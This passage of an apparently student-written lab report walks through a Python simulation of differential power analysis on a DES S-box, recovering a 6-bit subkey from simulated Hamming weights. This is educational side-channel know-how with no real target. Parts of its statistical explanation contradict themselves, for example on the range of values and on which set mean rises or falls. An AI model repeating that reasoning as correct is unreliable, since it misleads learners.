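Hamming difference</p></li><li><p>Complete the main function to find the correctly guessed key</p></li></ul></li><li><p>Test with 2 sets of data</p></li></ol><h2 id="实验步骤"><a href="#实验步骤" class="headerlink" title="实验步骤"></a>Procedure</h2><h3 id="完善Sboxdpa仿真-student-py程序"><a href="#完善Sboxdpa仿真-student-py程序" class="headerlink" title="完善Sboxdpa仿真-student.py程序"></a>Completing the Sboxdpa仿真-student.py program</h3><h4 id="补充变量"><a href="#补充变量" class="headerlink" title="补充变量"></a>Filling in the variables</h4><p>Fill in the three variables n, plaintext and keyTrue</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td 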
class="code"><pre><span class="line">n = <span class="number">9</span>  <span class="comment"># array length</span></span><br><span class="line">plainlist = [<span class="number">41</span>, <span class="number">35</span>, <span class="number">62</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">22</span>, <span class="number">46</span>, <span class="number">18</span>]  <span class="comment"># plaintext array</span></span><br><span class="line">keyTrue = <span class="number">43</span>  <span class="comment"># key used for encryption</span></span><br></pre></td></tr></table></figure><h4 id="完善HWfun函数"><a href="#完善HWfun函数" class="headerlink" title="完善HWfun函数"></a>Completing the HWfun function</h4><p>In essence this counts the 1 bits in the binary representation of a decimal number, so a fast method can be used. The number of operations of this method does not depend on the magnitude of the input n, only on the number of 1 bits in n: if the binary representation of n contains k ones, the loop runs only k times. It works by repeatedly clearing the rightmost 1 in the binary representation of n while incrementing a counter, until n is 0.</p><p>The completed code is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">HWfun</span>(<span class="params">num</span>):</span><br><span class="line">    <span class="comment"># Count and return the Hamming weight of the input num</span></span><br><span class="line">    ans = <span class="number">0</span></span><br><span class="line">    <span class="keyword">if</span> num == <span class="number">0</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line">    <span class="keyword">while</span> num > <span class="number">0</span>:</span><br><span class="line">        num &= (num - <span class="number">1</span>)</span><br><span class="line">        ans += <span class="number">1</span></span><br><span class="line">    <span 
class="keyword">return</span> ans</span><br></pre></td></tr></table></figure><blockquote><p>Why does n &= (n - 1) clear the rightmost 1? Because, in binary terms, n is n - 1 with 1 added to the lowest bit. For example, 8 (1000) = 7 (0111) + 1 (0001), so 8 & 7 = (1000) & (0111) = 0 (0000), which clears the rightmost 1 of 8 (in fact its highest 1, since the binary form of 8 contains only a single 1). Likewise 7 (0111) = 6 (0110) + 1 (0001), so 7 & 6 = (0111) & (0110) = 6 (0110), which clears the rightmost 1 in the binary representation of 7 (that is, the 1 in the lowest bit).</p></blockquote><h4 id="完善主函数"><a href="#完善主函数" class="headerlink" title="完善主函数"></a>Completing the main function</h4><p>A table-formatting library is used to tidy up the output.</p><p>The completed code is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    <span class="comment"># To complete: list of Hamming weights of the S-box outputs</span></span><br><span class="line">    table = pt.PrettyTable()</span><br><span class="line">    hw_std = []</span><br><span class="line">    HWout = sboxout(n, plainlist, keyTrue)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line">        hw_std.append(HWfun(HWout[i]))</span><br><span class="line">    table.add_column(<span class="string">'序号'</span>,[i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">1</span>,n+<span class="number">1</span>)])</span><br><span class="line">    table.add_column(<span class="string">'明文-十进制'</span>,[index <span class="keyword">for</span> index <span class="keyword">in</span> plainlist])</span><br><span class="line">    table.add_column(<span class="string">'S盒输出-十进制'</span>, 
[index <span class="keyword">for</span> index <span class="keyword">in</span> HWout])</span><br><span class="line">    table.add_column(<span class="string">'S盒输出-汉明重量'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> hw_std])</span><br><span class="line">    <span class="built_in">print</span>(table)</span><br></pre></td></tr></table></figure><h4 id="程序运行结果"><a href="#程序运行结果" class="headerlink" title="程序运行结果"></a>Program output</h4><p><img src="https://img-blog.csdnimg.cn/409ab0df29ba4a8fb80939d9939bc4ee.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAUmVhcGVyX01YQkc=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> Figure 6.1     Table output of the Sboxdpa仿真-student.py program </small> </b></center><h3>Completing the Sboxdpa-student.py program</h3><h4 id="补充变量-1"><a href="#补充变量-1" class="headerlink" title="补充变量"></a>Filling in the variables</h4><p>The plainlist array (the plaintext array) I use in this program is an array of length 1000 generated by <code>plainlist = list(np.random.randint(64, size=1000))</code>, mimicking the sample size used in the textbook. Likewise, the power_std array (the Hamming-weight array produced with the correct key) also has length 1000; its elements are shown in section 8.4, Data statistics, under "<a href="#明文数组长度为1000" target="_self">Plaintext array length 1000</a>".</p><h4 id="完善DPAfun函数"><a href="#完善DPAfun函数" class="headerlink" title="完善DPAfun函数"></a>Completing the DPAfun function</h4><p>I modified the <code>Meanfun</code> function slightly:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">Meanfun</span>(<span class="params">num</span>):</span><br><span class="line">    total = <span class="number">0</span></span><br><span class="line">    length = <span class="built_in">len</span>(num)</span><br><span class="line">    <span class="keyword">if</span> length == <span 
class="number">0</span>:</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(length):</span><br><span class="line">        total = total + num[i]</span><br><span class="line">    <span class="keyword">return</span> total / length</span><br></pre></td></tr></table></figure><p>The idea of the function is to take the median of the Hamming-weight array produced with the guessed key as the criterion for partitioning the Hamming-weight array produced with the correct key; the function then returns the difference between the two resulting sets.</p><p>The completed code is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">DPAfun</span>(<span class="params">n, pstd, ptest</span>):</span><br><span class="line">    <span class="comment"># Using 2 as the boundary, compute the difference between the sets of different Hamming weights</span></span><br><span class="line">    L_list = []</span><br><span class="line">    H_list = []</span><br><span class="line">    med = median(ptest)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line">        <span class="keyword">if</span> ptest[i] <= med:</span><br><span class="line">            L_list.append(pstd[i])</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            H_list.append(pstd[i])</span><br><span class="line">    <span class="keyword">return</span> Meanfun(H_list) - Meanfun(L_list)</span><br></pre></td></tr></table></figure><h4 id="完善主函数-1"><a href="#完善主函数-1" class="headerlink" 
title="完善主函数"></a>Completing the main function</h4><p>The logic is to iterate over all 64 keys: the XOR of the plaintext with each key is used as the S-box input to obtain the S-box output (simulating the DES processing flow), giving 64 Hamming-weight arrays. Each of the 64 arrays is passed to the DPAfun function, and the key corresponding to the largest DPAfun return value is the correct key.</p><blockquote><p>Because the DES S-box is "6-in, 4-out" and the plaintext is XORed with the key before entering the S-box, the 6-bit input requirement must be met, so the key search covers 2 to the power of 6 values.</p></blockquote><p>The completed code is as follows:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    <span class="comment"># Guess the key</span></span><br><span class="line">    keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line">    DPAlist = []</span><br><span class="line">    n = <span class="built_in">len</span>(plainlist)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line">        hw_std = []</span><br><span class="line">        HWout = sboxout(n, plainlist, i)  <span class="comment"># S-box output</span></span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line">            hw_std.append(HWfun(HWout[j]))  <span class="comment"># Hamming weight</span></span><br><span class="line">        DPAlist.append(DPAfun(n, power_std, hw_std))  <span class="comment"># difference of set means after the correct-key Hamming-weight array is split into two sets</span></span><br><span class="line">    final_dict = <span 
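class="built_in">dict</span>(<span class="built_in">zip</span>(keyList,DPAlist))</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">"正确密钥为:"</span>,<span class="built_in">max</span>(final_dict, key=final_dict.get))  <span class="comment"># take the key with the largest difference of set means</span></span><br></pre></td></tr></table></figure><p>I put the run results in the Summary to make comparison easier. <strong>They are in section 8.4, Data statistics</strong>, in the screenshot of the test results for <a href="#明文数组长度为1000" target="_self">plaintext array length 1000</a>.</p><h2 id="思考问题"><a href="#思考问题" class="headerlink" title="思考问题"></a>Questions for reflection</h2><h3 id="对分组密码算法进行DPA攻击时的基本原理"><a href="#对分组密码算法进行DPA攻击时的基本原理" class="headerlink" title="对分组密码算法进行DPA攻击时的基本原理"></a>Basic principle of a DPA attack on a block cipher</h3><p>A DPA attack recovers the key by statistically analysing the power consumption leaked by a cryptographic chip. It applies statistical tests to the power values at a large number of trace sample points, that is, it infers the key value from a large number of power samples, and it is more powerful than a simple power attack.</p><p>In my view, attacking a block cipher means attacking the S-box the cipher uses, because the S-box processes data discretely, whereas operations such as row shifts and column transformations are linear; the results of discrete processing do not readily reveal regularities. A DPA attack first collects, for N cryptographic operations, the plaintext (not the result of the cryptographic operation), the ciphertext and the power consumed. It then defines a partition function J(ciphertext, k) that is closely tied to the key and a value d on which the power consumption strongly depends, guesses the subkey value k and, based on the sampling time points, obtains two subsets of power traces (d=0 and d=1). The average power of each subset is computed to obtain the differential power trace. If the differential power trace shows a distinct peak at some position, the guess for k is correct. Once the guess is correct, the key is derived backwards through the cipher's subkey generation algorithm. (Subkey generation algorithms and key lengths differ between block ciphers, so the number of exhaustive-search steps in this reverse derivation differs as well.)</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><h3 id="猜测正确密钥思路详解"><a href="#猜测正确密钥思路详解" class="headerlink" title="猜测正确密钥思路详解"></a><strong>How the correct key is guessed, in detail</strong></h3><p>Because the DES S-box is "6-in, 4-out", the number of <code>1</code> bits in the binary form of an output ranges from 0 to 4. The median of each of the 64 Hamming arrays produced with the guessed keys can therefore only be one of five values: 0, 1, 2, 3 or 4. However, <strong>only the Hamming array produced with the correct key yields the largest difference after being processed by the DPAfun function</strong>.</p><h3 id="为什么集合均值的差值最大就是正确密钥?"><a href="#为什么集合均值的差值最大就是正确密钥?" 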
class="headerlink" title="为什么集合均值的差值最大就是正确密钥?"></a><strong>Why does the largest difference of set means indicate the correct key?</strong></h3><h4 id="猜测密钥汉明重量数组的中间值为2时的分析"><a href="#猜测密钥汉明重量数组的中间值为2时的分析" class="headerlink" title="猜测密钥汉明重量数组的中间值为2时的分析"></a>Analysis when the median of the guessed-key Hamming-weight array is 2</h4><p>Since 2 is itself the middle value of 0-5, once a Hamming-weight array contains enough elements its median is almost always 2; with my plaintext array of length 1000, the medians of all 64 Hamming-weight arrays were 2. The partition rule is: where the element of the guessed-key Hamming-weight array is less than or equal to 2, the corresponding element of the correct-key Hamming-weight array goes into set L, and the rest go into set H. The root cause of changes in the difference between the two sets is the migration of some elements from one set to the other.</p><p>An example makes this easier to follow (the median of the ptest array is 2):</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ptsd = [<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">4</span>,<span class="number">3</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">2</span>,……] <span class="comment"># Hamming-weight array obtained with the correct key</span></span><br><span class="line">ptest = [<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">2</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,<span class="number">2</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">4</span>,……] <span class="comment"># Hamming-weight array obtained with the guessed key</span></span><br></pre></td></tr></table></figure><p>The arrays are divided into five segments for easier viewing.</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0</span> 
<span class="number">1</span> <span class="number">2</span> <span class="number">3</span> <span class="number">4</span> | <span class="number">4</span> <span class="number">3</span> <span class="number">0</span> <span class="number">0</span> <span class="number">1</span> <span class="number">2</span> | <span class="number">3</span> <span class="number">4</span> <span class="number">3</span> <span class="number">4</span> <span class="number">3</span> <span class="number">4</span> | <span class="number">0</span> <span class="number">1</span> <span class="number">2</span> <span class="number">0</span> <span class="number">1</span> <span class="number">2</span> | …………</span><br><span class="line"><span class="number">0</span> <span class="number">1</span> <span class="number">2</span> <span class="number">3</span> <span class="number">4</span> | <span class="number">3</span> <span class="number">4</span> <span class="number">1</span> <span class="number">2</span> <span class="number">2</span> <span class="number">1</span> | <span class="number">0</span> <span class="number">0</span> <span class="number">1</span> <span class="number">1</span> <span class="number">2</span> <span class="number">2</span> | <span class="number">3</span> <span class="number">3</span> <span class="number">3</span> <span class="number">4</span> <span class="number">4</span> <span class="number">4</span> | …………</span><br></pre></td></tr></table></figure><p>The partition rule for a median of 2 was described above, so I will not repeat it. I have enumerated examples of all the ways ptsd can be split into the two sets when the median is 2.</p><p>Segment 1: the ptest and ptsd arrays have the same value at every position, so the difference of the set means after partitioning is unaffected;</p><p>Segment 2: although the ptest and ptsd arrays differ at every position, after partitioning ptsd the values 0, 1 and 2 all go into set L and the values 3 and 4 all go into set H, so the difference of the set means is unaffected;</p><p>Segment 3: the ptest and ptsd arrays differ at every position. The 4 ptsd elements that should have gone into set H are placed in set L instead, because the ptest values at the corresponding positions are less than or equal to the median 2. As a result the mean of set L necessarily increases, the mean of set H may decrease, and the difference of the set means decreases;</p><p>Segment 4: the ptest and ptsd arrays differ at every position. The 4 ptsd elements that should have gone into set L are placed in set H instead, because the ptest values at the corresponding positions are greater than the median 2. As a result the mean of set H necessarily decreases, the mean of set L may increase, and the difference of the set means decreases;</p><p>This raises another question: why does the partitioning in segments 3 and 4 lead to a "necessary" change in one set and a possible change in the other?</p><h4 id="集合均值的“必然”和“可能”变化分析"><a 
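href="#集合均值的“必然”和“可能”变化分析" class="headerlink" title="集合均值的“必然”和“可能”变化分析"></a>Analysis of the "necessary" and "possible" changes in the set means</h4><p>First, note that when the median of the Hamming-weight array is 2, the elements of set L range from a minimum of 0 to a maximum of 2, so its mean lies in 0-2; likewise, the mean of set H lies in 3-4.</p><p><strong>Segment 3</strong> is as follows:</p><p>When values such as 3 and 4, which are larger than the maximum mean of the original set L, are placed in set L, the mean of set L necessarily increases;</p><p>The mean of set H, having lost some of its 3 and 4 elements, may increase, decrease or stay the same.</p><ul><li>Because 3 is the lowest mean of set H, losing an element 3 makes the set mean increase or stay the same (the original set H consisted entirely of 3s).</li><li>Because 4 is the highest mean of set H, losing an element 4 makes the set mean decrease or stay the same (the original set H consisted entirely of 4s).</li></ul><p><strong>Segment 4</strong> is as follows:</p><p>When values such as 0, 1 and 2, which are smaller than the minimum mean of the original set H, are placed in set H, the mean of set H necessarily decreases;</p><p>The mean of set L, having lost some of its 0, 1 and 2 elements, may increase, decrease or stay the same.</p><ul><li>Because 0 is the lowest mean of set L, losing an element 0 makes the set mean increase or stay the same (the original set L consisted entirely of 0s).</li><li>Because 1 is the middle mean of set L, when an element 1 is lost:<ul><li>the set mean decreases: the original mean of set L was greater than 1;</li><li>the set mean stays the same: the original mean of set L was equal to 1;</li><li>the set mean increases: the original mean of set L was less than 1;</li></ul></li><li>Because 2 is the highest mean of set L, losing an element 2 makes the set mean decrease or stay the same (the original set L consisted entirely of 2s).</li></ul><p>In summary, the segment 3 case necessarily increases the mean of set L, while set H may change in any of the three ways, so overall the difference of the set means decreases; the segment 4 case necessarily decreases the mean of set H, while set H may change in any of the three ways, so overall the difference of the set means decreases.</p><p><strong>Note:</strong></p><p>The explanation above may raise a doubt: in the segment 3 case, for example, the mean of set L increases and the mean of set H may also increase, so why does an increase in the mean difference not occur?</p><p>This is not a concern when the array contains enough elements. As the array length tends to infinity, the five values 0, 1, 2, 3 and 4 occur in the array with equal probability, just as with tossing a coin or rolling a die: a large enough sample achieves it. On that basis, take the slightly more complicated segment 4 case as an example: with a large enough sample it is almost impossible for every element of a set to have the same value, so the case of an unchanged mean can be ignored. The mean of set L is then equally likely to increase or decrease, but set H necessarily increases, so overall the difference of the set means necessarily decreases.</p><p><strong>Conclusion:</strong></p><p>Therefore the difference of the means of the two sets is largest only when the elements of the ptest array equal the elements of the ptsd array one for one, that is, <strong>the difference of the means of the two sets is largest only when the guessed key is the correct key.</strong></p><blockquote><p>Parts of the ptest array may fall under the segment 1 or segment 2 case, but the segment 3 or segment 4 case will eventually occur and reduce the difference between the sets.</p></blockquote><h3 id="猜测密钥汉明重量数组的中间值不为2时的分析"><a href="#猜测密钥汉明重量数组的中间值不为2时的分析" class="headerlink" title="猜测密钥汉明重量数组的中间值不为2时的分析"></a>Analysis when the median of the guessed-key Hamming-weight array is not 2</h3><p>A median of 0, 1, 3 or 4 for the guessed-key Hamming-weight array is almost impossible when the array contains enough elements, but that case is analysed here as well.</p><p>The reason is simple and essentially the same as for a median of 2. A median of 0 or 1 means that at least half of the values in the array are 0 or 1, but the elements of the correct-key Hamming-weight array at the corresponding positions are very unlikely to all be 0 or 1. The correct-key elements at positions where the guessed-key element is greater than the median are all placed in set H, including elements smaller than 3, so the mean of set H necessarily decreases, while the mean of set L may change in any of the three ways. The conclusion for this case was already reached in <strong>8.2</strong>: the difference of the set means necessarily decreases.</p><p>Likewise, a median of 3 or 4 means that at least half of the values in the array are 3 or 4, which ultimately makes the mean of set L necessarily increase, while the mean of set L may change in any of the three ways, and the difference of the set means necessarily decreases.</p><h3 id="数据统计"><a href="#数据统计" class="headerlink" 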
title="数据统计"></a>Data statistics</h3><p>Theory is rather dry and less intuitive than data, so below I show some of the data I collected:</p><p>The test code is as follows; only the main function needs to be changed:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> __name__ == <span class="string">"__main__"</span>:</span><br><span class="line">    table = pt.PrettyTable()</span><br><span class="line">    guess = []</span><br><span class="line">    keyList = [i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>)]</span><br><span class="line">    n = <span class="built_in">len</span>(plainlist)</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line">        power_std = []</span><br><span class="line">        HWout_true = sboxout(n, plainlist, i)</span><br><span class="line">        <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line">            power_std.append(HWfun(HWout_true[j]))</span><br><span class="line">        DPAlist = []</span><br><span class="line">        <span class="keyword">for</span> k <span 
class="keyword">in</span> <span class="built_in">range</span>(<span class="number">64</span>):</span><br><span class="line">            hw_std = []</span><br><span class="line">            HWout = sboxout(n, plainlist, k)</span><br><span class="line">            <span class="keyword">for</span> m <span class="keyword">in</span> <span class="built_in">range</span>(n):</span><br><span class="line">                hw_std.append(HWfun(HWout[m]))</span><br><span class="line">            DPAlist.append(DPAfun(n, power_std, hw_std))</span><br><span class="line">        final_dict = <span class="built_in">dict</span>(<span class="built_in">zip</span>(keyList, DPAlist))</span><br><span class="line">        guess.append(<span class="built_in">max</span>(final_dict, key=final_dict.get))</span><br><span class="line">    table.add_column(<span class="string">'使用密钥:'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> keyList])</span><br><span class="line">    table.add_column(<span class="string">'猜测密钥:'</span>, [index <span class="keyword">for</span> index <span class="keyword">in</span> guess])</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">'正确率:{:.2%}'</span>.<span class="built_in">format</span>(<span class="built_in">sum</span>(k == g <span class="keyword">for</span> k, g <span class="keyword">in</span> <span class="built_in">zip</span>(keyList, guess))/<span class="number">64</span>))  <span class="comment"># position-wise matches; a set intersection only counts distinct guessed values</span></span><br><span class="line">    <span class="built_in">print</span>(table)</span><br></pre></td></tr></table></figure><p>With a plaintext array of length 9, the results and accuracy of the 64 key guesses:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Sample array:</span></span><br><span class="line">[<span class="number">41</span>, <span class="number">35</span>, <span class="number">62</span>, <span class="number">4</span>, <span class="number">33</span>, <span class="number">44</span>, <span class="number">22</span>, <span 
class="number">46</span>, <span class="number">18</span>]</span><br></pre></td></tr></table></figure><p><img src="https://img-blog.csdnimg.cn/1677cd72bbe74f53ae9a722482cab614.png#pic_center" alt="在这里插入图片描述"></p><center> <b> <small> Figure 8.1     Test results for the plaintext array of length 9 </small> </b></center><div id="明文数组长度为1000">With a plaintext array of length 1000</div>, the results and accuracy of the 64 key guesses:<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Sample code</span></span><br><span class="line">[<span class="number">42</span>, <span class="number">17</span>, <span class="number">10</span>, <span class="number">7</span>, <span class="number">22</span>, <span class="number">26</span>, <span class="number">42</span>, <span class="number">31</span>, <span class="number">8</span>, <span class="number">24</span>, <span class="number">40</span>, <span class="number">4</span>, <span class="number">49</span>, <span class="number">53</span>, <span class="number">23</span>, <span class="number">17</span>, <span class="number">16</span>, <span class="number">10</span>, <span class="number">55</span>, <span class="number">4</span>, <span class="number">7</span>, <span class="number">43</span>, <span class="number">29</span>, <span class="number">26</span>, <span class="number">16</span>, <span class="number">21</span>, <span class="number">45</span>, <span class="number">21</span>, <span class="number">37</span>, <span class="number">48</span>, <span class="number">2</span>, <span class="number">49</span>, <span class="number">23</span>, <span class="number">37</span>, <span class="number">58</span>, <span class="number">14</span>, <span class="number">25</span>, <span class="number">60</span>, <span class="number">33</span>, <span class="number">19</span>, <span class="number">17</span>, <span class="number">22</span>, <span class="number">29</span>, <span class="number">47</span>, <span 
class="number">0</span>, <span class="number">38</span>, <span class="number">43</span>, <span class="number">17</span>, <span class="number">47</span>, <span class="number">9</span>, <span class="number">57</span>, <span class="number">39</span>, <span class="number">62</span>, <span class="number">60</span>, <span class="number">25</span>, <span class="number">28</span>, <span class="number">54</span>, <span class="number">53</span>, <span class="number">12</span>, <span class="number">29</span>, <span class="number">8</span>, <span class="number">60</span>, <span class="number">29</span>, <span class="number">4</span>, <span class="number">28</span>, <span class="number">6</span>, <span class="number">14</span>, <span class="number">12</span>, <span class="number">49</span>, <span class="number">19</span>, <span class="number">23</span>, <span class="number">20</span>, <span class="number">44</span>, <span class="number">43</span>, <span class="number">37</span>, <span class="number">37</span>, <span class="number">54</span>, <span class="number">23</span>, <span class="number">2</span>, <span class="number">20</span>, <span class="number">49</span>, <span class="number">38</span>, <span class="number">32</span>, <span class="number">27</span>, <span class="number">41</span>, <span class="number">9</span>, <span class="number">52</span>, <span class="number">34</span>, <span class="number">24</span>, <span class="number">60</span>, <span class="number">18</span>, <span class="number">4</span>, <span class="number">30</span>, <span class="number">17</span>, <span class="number">51</span>, <span class="number">17</span>, <span class="number">13</span>, <span class="number">41</span>, <span class="number">25</span>, <span class="number">49</span>, <span class="number">12</span>, <span class="number">1</span>, <span class="number">56</span>, <span class="number">4</span>, <span class="number">61</span>, <span class="number">4</span>, <span class="number">38</span>, 
<span class="number">57</span>, <span class="number">30</span>, <span class="number">60</span>, <span class="number">5</span>, <span class="number">23</span>, <span class="number">23</span>, <span class="number">31</span>, <span class="number">30</span>, <span class="number">56</span>, <span class="number">22</span>, <span class="number">9</span>, <span class="number">41</span>, <span class="number">61</span>, <span class="number">33</span>, <span class="number">20</span>, <span class="number">24</span>, <span class="number">43</span>, <span class="number">30</span>, <span class="number">63</span>, <span class="number">60</span>, <span class="number">33</span>, <span class="number">46</span>, <span class="number">0</span>, <span class="number">41</span>, <span class="number">3</span>, <span class="number">10</span>, <span class="number">49</span>, <span class="number">39</span>, <span class="number">7</span>, <span class="number">14</span>, <span class="number">8</span>, <span class="number">42</span>, <span class="number">6</span>, <span class="number">58</span>, <span class="number">3</span>, <span class="number">10</span>, <span class="number">3</span>, <span class="number">28</span>, <span class="number">33</span>, <span class="number">31</span>, <span class="number">49</span>, <span class="number">24</span>, <span class="number">60</span>, <span class="number">0</span>, <span class="number">54</span>, <span class="number">46</span>, <span class="number">40</span>, <span class="number">27</span>, <span class="number">63</span>, <span class="number">23</span>, <span class="number">30</span>, <span class="number">50</span>, <span class="number">26</span>, <span class="number">23</span>, <span class="number">40</span>, <span class="number">2</span>, <span class="number">54</span>, <span class="number">29</span>, <span class="number">37</span>, <span class="number">17</span>, <span class="number">52</span>, <span class="number">31</span>, <span 
class="number">11</span>, <span class="number">47</span>, <span class="number">55</span>, <span class="number">7</span>, <span class="number">59</span>, <span class="number">40</span>, <span class="number">18</span>, <span class="number">38</span>, <span class="number">44</span>, <span class="number">12</span>, <span class="number">36</span>, <span class="number">58</span>, <span class="number">27</span>, <span class="number">30</span>, <span class="number">43</span>, <span class="number">49</span>, <span class="number">25</span>, <span class="number">17</span>, <span class="number">47</span>, <span class="number">56</span>, <span class="number">24</span>, <span class="number">28</span>, <span class="number">19</span>, <span class="number">25</span>, <span class="number">28</span>, <span class="number">25</span>, <span class="number">35</span>, <span class="number">52</span>, <span class="number">2</span>, <span class="number">62</span>, <span class="number">48</span>, <span class="number">61</span>, <span class="number">61</span>, <span class="number">63</span>, <span class="number">34</span>, <span class="number">15</span>, <span class="number">55</span>, <span class="number">26</span>, <span class="number">40</span>, <span class="number">0</span>, <span class="number">52</span>, <span class="number">61</span>, <span class="number">5</span>, <span class="number">0</span>, <span class="number">38</span>, <span class="number">32</span>, <span class="number">31</span>, <span class="number">39</span>, <span class="number">44</span>, <span class="number">56</span>, <span class="number">36</span>, <span class="number">4</span>, <span class="number">29</span>, <span class="number">41</span>, <span class="number">19</span>, <span class="number">60</span>, <span class="number">16</span>, <span class="number">28</span>, <span class="number">28</span>, <span class="number">38</span>, <span class="number">49</span>, <span class="number">46</span>, <span 
class="number">26</span>, <span class="number">42</span>, <span class="number">35</span>, <span class="number">5</span>, <span class="number">10</span>, <span class="number">22</span>, <span class="number">51</span>, <span class="number">63</span>, <span class="number">11</span>, <span class="number">11</span>, <span class="number">7</span>, <span class="number">0</span>, <span class="number">40</span>, <span class="number">42</span>, <span class="number">17</span>, <span class="number">59</span>, <span class="number">14</span>, <span class="number">19</span>, <span class="number">0</span>, <span class="number">35</span>, <span class="number">39</span>, <span class="number">48</span>, <span class="number">58</span>, <span class="number">52</span>, <span class="number">37</span>, <span class="number">28</span>, <span class="number">58</span>, <span class="number">44</span>, <span class="number">58</span>, <span class="number">39</span>, <span class="number">36</span>, <span class="number">36</span>, <span class="number">27</span>, <span class="number">41</span>, <span class="number">41</span>, <span class="number">48</span>, <span class="number">26</span>, <span class="number">47</span>, <span class="number">21</span>, <span class="number">11</span>, <span class="number">24</span>, <span class="number">21</span>, <span class="number">42</span>, <span class="number">27</span>, <span class="number">33</span>, <span class="number">10</span>, <span class="number">18</span>, <span class="number">32</span>, <span class="number">52</span>, <span class="number">8</span>, <span class="number">23</span>, <span class="number">23</span>, <span class="number">32</span>, <span class="number">20</span>, <span class="number">63</span>, <span 